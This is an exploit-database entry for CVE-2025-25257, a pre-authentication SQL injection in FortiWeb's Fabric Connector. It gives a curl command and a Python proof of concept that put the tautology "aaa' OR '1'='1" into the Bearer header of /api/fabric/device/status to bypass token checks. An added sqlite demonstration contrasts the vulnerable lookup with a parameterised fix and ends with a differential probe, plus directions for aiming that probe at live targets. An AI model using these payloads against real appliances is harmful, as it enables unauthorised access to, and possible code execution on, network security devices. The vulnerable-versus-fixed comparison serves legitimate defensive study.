FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution

Published: 04 Feb 2026
Reported by: Milad Karimi (Ex3ptionaL)
Type: exploitdb
Source: www.exploit-db.com

Pre-auth SQL injection in FortiWeb Fabric Connector 7.0–7.6.x enables remote code execution (CVE-2025-25257).

Code
# Exploit Title: FortiWeb Fabric Connector 7.6.x - Pre-authentication SQL Injection to Remote Code Execution
# Date: 2025-10-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win, Ubuntu
# CVE : CVE-2025-25257

Overview

CVE-2025-25257 is a pre-authentication SQL injection vulnerability in the
Fabric Connector component of Fortinet FortiWeb. Fortinet's advisory for it
(FG-IR-25-151) lists FortiWeb 7.0.0 through 7.0.10, 7.2.0 through 7.2.10,
7.4.0 through 7.4.7 and 7.6.0 through 7.6.3 as affected, fixed in 7.0.11,
7.2.11, 7.4.8 and 7.6.4 respectively.
The value of the Authorization: Bearer header sent to the
/api/fabric/device/status endpoint is placed into a SQL query without
sanitisation, so an unauthenticated attacker controls part of that query.
A tautology such as ' OR '1'='1 makes the token check succeed for any caller,
and the same primitive can be developed further into Remote Code Execution
(RCE). The PoCs below demonstrate only the injection primitive, not the RCE
stage.


PoC

The header value below lands in the token-lookup query; the ' OR '1'='1
tautology makes the WHERE clause true for every row, so a vulnerable appliance
treats the request as authenticated. A single 200 response is not proof on its
own: send the same request with ' OR '1'='2 and with a plain bogus token as
controls. A patched appliance answers all three the same way; only a vulnerable
one treats the tautology differently from the contradiction.

curl -k -H "Authorization: Bearer aaa' OR '1'='1" \
  https://<fortiweb-ip>/api/fabric/device/status

PoC Python

import argparse
import requests
import urllib3

# FortiWeb management interfaces usually carry self-signed certificates, so
# certificate verification is disabled below; silence the resulting warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def test_sqli(base_url):
    """Send the tautology payload in the Bearer header and print the reply."""
    url = f"{base_url}/api/fabric/device/status"
    headers = {
        "Authorization": "Bearer aaa' OR '1'='1"
    }
    try:
        response = requests.get(url, headers=headers, verify=False, timeout=10)
        print(f"Status code: {response.status_code}")
        print("Response body:")
        print(response.text)
    except requests.RequestException as e:
        print(f"Error: {e}")


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="PoC SQLi By Ex3ptionaL CVE-2025-25257 FortiWeb")
    parser.add_argument("base_url",
                        help="Base URL of FortiWeb (ex: https://10.0.0.5)")
    args = parser.parse_args()
    test_sqli(args.base_url)

# python3 src/poc.py https://10.0.0.5
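The injection described in the Overview, and the boolean check that both PoCs above perform with a single request, as an added worked example. This is not code from the exploit-db entry or from Fortinet: the table, column names, token values and the endpoint stand-in are constructed for illustration (the real FortiWeb schema and query are not on this page). It places the bug class (header value concatenated into SQL) beside the parameterised fix, then runs a three-request differential probe against each so the reader can see why the tautology alone is a weak signal.

```python
"""Boolean-based SQL injection in a bearer-token lookup: vulnerable vs fixed.

Added example; not the exploit-db author's or Fortinet's code. Schema, data and
the endpoint stand-in are constructed for illustration only.
"""
import re
import sqlite3
from typing import Callable, Dict, Optional, Tuple

Response = Tuple[int, str]          # (HTTP status, body)
Lookup = Callable[[sqlite3.Connection, str], Optional[str]]


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two fabric devices, each with an API token."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE fabric_tokens (id INTEGER PRIMARY KEY, device TEXT, token TEXT)")
    db.executemany(
        "INSERT INTO fabric_tokens (device, token) VALUES (?, ?)",
        [("fgt-01", "tok-8f3c0a"), ("fmg-01", "tok-21ab9e")],
    )
    db.commit()
    return db


def lookup_vulnerable(db: sqlite3.Connection, bearer: str) -> Optional[str]:
    """The bug class on this page: the header value is pasted into the SQL text,
    so `aaa' OR '1'='1` turns the WHERE clause into a tautology."""
    sql = "SELECT device FROM fabric_tokens WHERE token = '" + bearer + "'"
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def lookup_fixed(db: sqlite3.Connection, bearer: str) -> Optional[str]:
    """Parameterised form: the token is bound as data, never parsed as SQL."""
    row = db.execute("SELECT device FROM fabric_tokens WHERE token = ?", (bearer,)).fetchone()
    return row[0] if row else None


def handle_status(lookup: Lookup, db: sqlite3.Connection, headers: Dict[str, str]) -> Response:
    """Minimal stand-in for a token-authenticated device-status endpoint."""
    m = re.match(r"^Bearer\s+(.+)$", headers.get("Authorization", ""))
    if not m:
        return 401, "missing bearer token"
    try:
        device = lookup(db, m.group(1))
    except sqlite3.OperationalError as exc:   # broken SQL surfaces as a server error
        return 500, f"database error: {exc}"
    if device is None:
        return 401, "invalid token"
    return 200, f"{device}: connected"


def boolean_probe(send: Callable[[Dict[str, str]], Response]) -> Dict[str, object]:
    """Three-request differential: a baseline bogus token, a tautology and a
    contradiction. Injectable if the tautology diverges from baseline while the
    contradiction matches it; a fourth request with a stray quote checks whether
    malformed SQL leaks as a server error."""
    def hit(token: str) -> Response:
        return send({"Authorization": f"Bearer {token}"})

    baseline = hit("aaa")
    true_case = hit("aaa' OR '1'='1")
    false_case = hit("aaa' OR '1'='2")
    broken = hit("aaa'")
    injectable = true_case != baseline and false_case == baseline
    return {
        "baseline": baseline, "true": true_case, "false": false_case,
        "syntax_error": broken[0] == 500, "injectable": injectable,
    }


if __name__ == "__main__":
    db = make_db()
    for name, lookup in (("vulnerable", lookup_vulnerable), ("fixed", lookup_fixed)):
        result = boolean_probe(lambda h, lk=lookup: handle_status(lk, db, h))
        print(name, result)
```

Against the vulnerable lookup the tautology returns 200 for the first device while the contradiction and the baseline both return 401, and the unbalanced quote produces a 500; against the parameterised lookup all four requests return 401. To point the probe at a live target, replace `send` with a function that issues the HTTP request and returns `(status_code, text)`.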


Scores (as of 04 Feb 2026)

CVSS 3.1: 9.8
Vulners AI Score: 8.6 (High risk)
EPSS: 0.26204